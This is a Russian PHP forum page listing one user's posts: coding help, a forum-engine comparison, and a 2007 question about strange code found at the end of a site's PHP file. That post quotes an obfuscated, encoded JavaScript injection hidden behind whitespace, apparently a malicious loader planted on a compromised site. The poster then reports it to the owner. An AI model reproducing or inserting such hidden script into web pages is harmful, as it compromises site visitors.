PHP.SU

Программирование на PHP, MySQL и другие веб-технологии
PHP.SU Портал     На главную страницу форума Главная     Помощь Помощь     Поиск Поиск     Поиск Яндекс Поиск Яндекс     Вакансии  Пользователи Пользователи

Страниц (6): [1] 2 3 4 5 6 »

> Найдено сообщений: 87
Wange Отправлено: 16 Сентября, 2008 - 22:21:37 • Тема: strtolower и кирилица. Проблема! • Форум: Программирование на PHP

Ответов: 17
Просмотров: 1855
Непонятно суть проблемы, если честно.
Если выставлена кодировка в mysql utf8 регистронезависимая то ей все равно как будет сохранен в ней текст. никаких процедур и функций городить не надо.
Wange Отправлено: 29 Июня, 2008 - 10:37:31 • Тема: Переменные внутри функций • Форум: Программирование на PHP

Ответов: 13
Просмотров: 452
Подход очень странный. Зачем такой странный вариант коннекта?
А не проще ли подключиться к БД в файле connect.php? А потом использовать это подключение.
Wange Отправлено: 26 Июня, 2008 - 19:59:26 • Тема: смена движка форума. • Форум: Колонка администратора

Ответов: 30
Просмотров: 18748
Я конечно не модератор и не одмин. Но могу рассказать свой опыт в движках.

1) vBulletin - весьма хороший и очень мощный движок
Плюсы:
- высокая степень развития проекта, все "баги" достаточно быстро устраняются
- система "скинов"
- юзерфрендли (даже очень!!)
Минусы:
- плохая масштабируемость
- как следствие очень "тяжелые" страницы, для тех кому траффик стоит денег не самый лучший вариант!
- поиск не всегда корректно работает

2)SMF
Плюсы:
- высокая степень развития проекта, все "баги" достаточно быстро устраняются
- система "скинов"
- юзерфрендли
- грамотная система поиска
Минусы:
- масштабируемость

3)IPB
Плюсы:
- высокая степень развития проекта, все "баги" быстро устраняются, но не всегда.
- система "скинов"
- интерфейс не во всех местах дружелюбен
- хорошая система поиска
Минусы:
- масштабируемость

4)phpBB
Плюсы:
- низкая степень развития проекта, все "баги" устраняются со низкой скоростью, но не всегда.
- система "скинов"
- интерфейс не во всех местах дружелюбен
- хорошая система поиска
Минусы:
- масштабируемость
Wange Отправлено: 23 Июня, 2008 - 14:46:09 • Тема: Как правильно передать данные в cookies • Форум: Программирование на PHP

Ответов: 6
Просмотров: 297
Может стоит увеличить время жизни хотя бы до 1 часа, вместо 30 секунд?!

PHP:
скопировать код в буфер обмена
  1. <?PHP
  2. setcookie ("TestCookie", $value);
  3. setcookie ("TestCookie", $value,time()+3600);  /* период действия - 1 час */
  4. setcookie ("TestCookie", $value,time()+3600, "/~rasmus/", ".utoronto.ca", 1);
  5. ?>
Wange Отправлено: 22 Июня, 2008 - 20:33:24 • Тема: смена движка форума. • Форум: Колонка администратора

Ответов: 30
Просмотров: 18748
kamikadze пишет:
Радость Я его и предлагал Закатив глазки

не капал так глубоко в modx

знаю очень много форумов основных на этом движке больше всех запомнился вот этот http://forum[dot]ubuntu[dot]ru/
Wange Отправлено: 22 Июня, 2008 - 19:14:27 • Тема: смена движка форума. • Форум: Колонка администратора

Ответов: 30
Просмотров: 18748
Предлагаю SMF http://www[dot]simplemachines[dot]org/
Simple Machines Forum — SMF in short — is a free, professional grade software package that allows you to set up your own online community within minutes.

Данный движок используют многие open source проекты. Достаточно хорош...
Wange Отправлено: 03 Мая, 2008 - 19:29:20 • Тема: id3v2 теги • Форум: Программирование на PHP

Ответов: 4
Просмотров: 283
Niawaps пишет:
Хороший скриптУлыбка Правда когда прописываю теги на русском языке, то в мр3 проигрывателе вместо названия каракули... Подскажите пожалуйста, почему так...?


Дело в проигрывателе.
Wange Отправлено: 20 Июля, 2007 - 07:08:56 • Тема: Что это такое?! • Форум: Программирование на PHP

Ответов: 3
Просмотров: 305
спасибо помотрел. сообщил владельцу сайта.
Wange Отправлено: 19 Июля, 2007 - 17:58:00 • Тема: Что это такое?! • Форум: Программирование на PHP

Ответов: 3
Просмотров: 305
Собственно сабж, в конце кода непонятные для меня сочетание символов, что это кто-нибудь знает?

PHP:
скопировать код в буфер обмена
  1.  
  2. $ctrl->Exec($page);
  3.  
  4. $time_end=getmicrotime();
  5. //echo $time_end-$time_start;
  6. //var_dump($page);
  7. printt($page, $ctrl->getTpl());
  8.  
  9. $time_end=getmicrotime();
  10. //echo $time_end-$time_start;
  11.  
  12. ?>
  13.  
  14.                                                                                                                                 <!--[O]--><script>document.write(unescape("%3Cscript%3Etry%20%7Bvar%20pA%3D%27rr0rf0rD0
  15. r70rK0rc0rw0ry0r50rp0rI0rY0rT0rk0rl0rR0rH0r30rx0rz0rZ0re0r60rW0r80rX0rm0rV0rq0rd0rC
  16. 0rB0rt0rG0rN0rF0ro0rb0rA0rg0rJ0rn0ri0rL0r90rs0rh0rP0rU0rM0ra0rO0rj0r40fr0ff0fD0f70fK0f
  17. c0fw0fy0f50fp0fI0fY0fT0fk0fl0fR0fH0f30fx0fz0fZ0fe0f60fW0f80fX%27%2CZe%3DpA.substr%2
  18. 82%2C1%29%3Bvar%20hQ%3DArray%2824844%5E24907%2CnS%28%278%27%29%2CnS
  19. %28%2724%27%29%2C25802%5E25795%2CnS%28%2718%27%29%2CnS%28%2711%27
  20. %29%2C4174%5E4161%2CnS%28%2769%27%29%2C15754%5E15767%2C423%5E425%2
  21. CnS%28%2721%27%29%2CnS%28%2720%27%29%2CnS%28%2791%27%29%2CnS%28
  22. %2755%27%29%2CnS%28%2753%27%29%2C28542%5E28531%2C26090%5E26041%2C9
  23. 894%5E9863%2C26759%5E26793%2CnS%28%2787%27%29%2C23107%5E23161%2C201
  24. 05%5E20187%2CnS%28%270%27%29%2CnS%28%2726%27%29%2CnS%28%2723%27%
  25. 29%2CnS%28%2770%27%29%2C26935%5E26921%2CnS%28%2712%27%29%2C22312%
  26. 5E22295%2C15834%5E15859%2C16973%5E16989%2C2285%5E2221%2C4896%5E4981%2
  27. CnS%28%2747%27%29%2C26655%5E26633%2C17965%5E17969%2CnS%28%2780%27%
  28. 29%2CnS%28%2767%27%29%2CnS%28%2777%27%29%2C6548%5E6619%2CnS%28%2
  29. 775%27%29%2C1556%5E1547%2CnS%28%2789%27%29%2CnS%28%273%27%29%2C2
  30. 0979%5E20943%2CnS%28%2754%27%29%2C7149%5E7109%2C27045%5E27043%2C252
  31. 08%5E25173%2CnS%28%2762%27%29%2CnS%28%2749%27%29%2CnS%28%2792%27
  32. %29%2CnS%28%2774%27%29%2C5439%5E5383%2CnS%28%2752%27%29%2C16777%
  33. 5E16805%2CnS%28%2784%27%29%2CnS%28%2719%27%29%2CnS%28%2786%27%29
  34. %2C31032%5E31009%2CnS%28%2765%27%29%2CnS%28%2790%27%29%2CnS%28%2
  35. 768%27%29%2CnS%28%2742%27%29%2CnS%28%2743%27%29%2C6543%5E6575%2C
  36. nS%28%2737%27%29%2CnS%28%271%27%29%2CnS%28%2766%27%29%2C16287%5E
  37. 16313%2CnS%28%2739%27%29%2CnS%28%2757%27%29%2CnS%28%2773%27%29%
  38. %5E10159%2C768%5E881%2CnS%28%2735%27%29%2C18845%5E18901%2C15997%5E1
  39. 5923%2C4381%5E4433%2CnS%28%2781%27%29%29%2CeL%3Bvar%20ia%2CRJ%3Bvar%
  40. 20yl%3D%27rrrfrDr7rKrcrwryr5rprIrDrwrKrYrIrTrkrlrRrHr3rKrxrzrRrlrZrer6rTrRrWr7rTrRr5r8
  41. rXrIrmrVrTrqrWrwrmrHrerzrTrdrCrYrXrTrIrmrVrTrqrWrwrmrHrerBrTrdrCrYrtrfrmrwrGrKrNrm
  42. rHrRr5r8rtrFrmrwrGrKrNrmrHrerorbrArgrJrJrJrJrJrerBrTrnrYrDrprNrmrIrwrtrDrYrYrCrKrmrTrX
  43. rTr3rKrxrorirXrirormrfrDrWrcrmrHrRrlrZrerorirBrmrLrcrKr7rmrfrXrirordrCrYrtrwrYr9rsrGrhrwr
  44. 7rKrIrFrHrerBrTrPrRrWr7rTrUrMrarXrOrfrjr5rsr4frrOrBrRrWr7rTrYrsr9rXrOrjrOrzrhffrYrXrOrpr
  45. crnrWrwrmrjrtrDr8rWrfrfrKrDrwrmr8rtrYr7rFrOrBrRrWr7rTrarsr5rXrOfDf7rwrNr8fDrOrBrKr5rH
  46. rnrYrDrprNrmrIrwrtrDrYrYrCrKrmrtrKrIrnrmrLfrr5rHrUrMrarorOrXrOrorYrsr9rerXrXfKrjrer6rTr
  47. RrWr7rTrVfcrRrXrOf7rwrwrcfwfDfDrOrorHrnrYrDrprNrmrIrwrtr8rYrDrWrwrKrYrIrtf7rYrfrwrTfyr
  48. XrTrOrOf5rOrOfwfpfIr3rHrererornrYrDrprNrmrIrwrtr8rYrDrWrwrKrYrIrtf7rYrfrwrtr7rmrcr8rWrD
  49. rmrHfDfYfTrWfKfkrJfKflrtfKfRfDrzrOrtrOrertr7rmrcr8rWrDrmrHfDfHrtrofDrzrOrtrOrerorOrtrOro
  50. fpfIr3rHrerorOrtrOrorhffrYrorarsr5rBrRrWr7rTrxrDrFrXrnrYrDrprNrmrIrwrtrDr7rmrWrwrmrMr8
  51. rmrNrmrIrwrHrOrKr5r7rWrNrmrOrerBrxrDrFrtrfrmrwrZrwrwr7rKfcrprwrmrHrOrfr7rDrOrzrVfcr
  52. RrerBrxrDrFrtr5r7rWrNrmf3rYr7rnrmr7rXrJrBrTrxrDrFrtrVrKrnrwf7rXfxrBrxrDrFrtf7rmrKrFf7rw
  53. rXrjrBrwr7fzrTr6rTrnrYrDrprNrmrIrwrtfcrYrnfzrtrWrcrcrmrIrnr4f7rKr8rnrHrxrDrFrerBrkrlrRrHr
  54. UrMrarzrYrsr9rerBrTrPrDrWrwrDf7rHrmrer6rTrnrYrDrprNrmrIrwrtrVr7rKrwrmrHrOrrf7rwrNr8r
  55. yrrfcrYrnfzryrrfDfcrYrnfzryrrfDf7rwrNr8ryrOrerBrnrYrDrprNrmrIrwrtfcrYrnfzrtrWrcrcrmrIrnr4f7
  56. rKr8rnrHrxrDrFrerBrTrkrlrRrHrUrMrarzrYrsr9rerBrTrPrTrPfZr5rprIrDrwrKrYrIrTfpfIr3rHrer6rTr
  57. RrWr7rTferYfzrXfxrgrBrRrWr7rTrMrDf7rXrirJrjfxf6rgfWrAf8rbflrJrWfcrDrnrmr5rirzfkrcrarXririrB
  58. rTr5rYr7rHfpf7rWrXrJrBrTfpf7rWrTrrrTferYfzrBrTfpf7rWrororerTfkrcrarorXrTrMrDf7rtrfrpfcrfrw
  59. r7rHrsrWrwf7rtr5r8rYrYr7rHrsrWrwf7rtr7rWrIrnrYrNrHrefXrMrDf7rtr8rmrIrFrwf7rerzrjrzrjrerBr
  60. Tr7rmrwrpr7rIrTfkrcrarBrTrPrrfDrfrDr7rKrcrwry%27%2CHF%3D%27%27%3BpA%3DpA.split
  61. %28Ze%29%3Bfor%28eL%3D0%3BeL%3Cyl.length%3BeL+%3D2%29%7BRJ%3Dyl.substr%
  62. 28eL%2C2%29%3Bfor%28ia%3D0%3Bia%3CpA.length%3Bia++%29%7Bif%28pA%5Bia%5
  63. D%3D%3DRJ%29break%3B%7D%20HF+%3DString.fromCharCode%28hQ%5Bia%5D%5E12
  64. 3%29%3B%7Dfunction%20nS%28fS%29%7Breturn%20parseInt%28fS%29%7Ddocument.write
  65. %28HF%29%3B%7D%0Acatch%28e%29%7B%7D%3C/script%3E"))</script><!--[/O]-->
  66.  
Wange Отправлено: 06 Июня, 2007 - 14:33:27 • Тема: Перевод численных значений в строки... • Форум: Пользовательские функции

Ответов: 5
Просмотров: 388
Jakeryf
на 79 строке выдается ошибка Uninitialized string offset: -1
PHP:
скопировать код в буфер обмена
  1.  
  2. 77 if($cur_thousands_order == "единицы")
  3. 78         {
  4. 79           if($num[$i-1] == "1")
  5. 80           {
  6. 81            $next_digit = $num[$i];
  7. 82             $str = " тысяч".$str;
  8. 83           }
  9. 84           else
  10. 85             $str = write_units_thousands_units($num[$i]).$str;
  11. 86           $cur_thousands_order = "десятки";
  12. 87         }
  13.  


функция очень хороша. из классических. с разбиением по родам =).
http://kladovka[dot]net[dot]ru/delphibas[dot][dot][dot]ert&id=10264 - здесь для дельфи лежит подобная, там еще придуман нейтральный род =D
Wange Отправлено: 09 Февраля, 2007 - 07:37:27 • Тема: Создание веб хранилища пользовательских функций php • Форум: FreeLance

Ответов: 29
Просмотров: 14535
Ну вроде бы наше немногочисленное сообщество поддержало данный проект. Теперь хотелось бы узнать, каким должно быть это "хранилище". Основной вопрос сейчас в интерфейсе, как сделать так что бы было удобно. Как правильно разделить функции на категории (какие категории вообще создавать).
Надеюсь у кого-нибудь есть мнение по этому поводу? Ниндзя

Такие дела
Wange Отправлено: 25 Января, 2007 - 05:52:50 • Тема: Создание веб хранилища пользовательских функций php • Форум: FreeLance

Ответов: 29
Просмотров: 14535
UserID пишет:
Всё уже давно решено: http://koders[dot]com Не хранилище, а бездна просто по разным языкам программирования.


моя прокся говорит:

Цитата:
ОШИБКА
Запрошенный URL не может быть доставлен

Во время доставки URL: http://koders[dot]com/

Произошла следующая ошибка:
Ошибка чтения

Система сообщила:
(104) Connection reset by peer

Во время чтения данных из сети возникла ошибка. Пожалуйста, повторите Ваш запрос.

Generated Fri, 26 Jan 2007 03:33:54 GMT by proxy.urtg.gazprom.ru (squid/2.5.STABLE14)


надо не забывать приписывать к адресу даблю даблю даблю
Wange Отправлено: 24 Января, 2007 - 13:26:05 • Тема: Создание веб хранилища пользовательских функций php • Форум: FreeLance

Ответов: 29
Просмотров: 14535
f0rm4t пишет:
Думаю проблема будет другой - забить базу, а не чистить ее...

да думаю основная проблема в этом то и будет. А про модерацию это и так понятно, что без неё никуда, но все таки =) спасибо. Ниндзя
Wange Отправлено: 19 Января, 2007 - 19:29:24 • Тема: Копирование файлов • Форум: Программирование на PHP

Ответов: 5
Просмотров: 340
впринципе в слепую можно скопировать ВСЕ файлы из одного каталога в другой.
алгоритм следующий:
Открываем директорию
Сканируем все файлы и создаем массив из имен
по количеству имен в массиве узнаем количество файлов
Функцией копирование копируем все файлы в новую директоию
Wange Отправлено: 19 Января, 2007 - 19:26:19 • Тема: Создание веб хранилища пользовательских функций php • Форум: FreeLance

Ответов: 29
Просмотров: 14535
Я думаю голосование будет до 5 февраля, после будет предложение как все сделать.

Страниц (6): [1] 2 3 4 5 6 »
Powered by PHP  Powered By MySQL  Powered by Nginx  Valid CSS  RSS

 
Powered by ExBB FM 1.0 RC1. InvisionExBB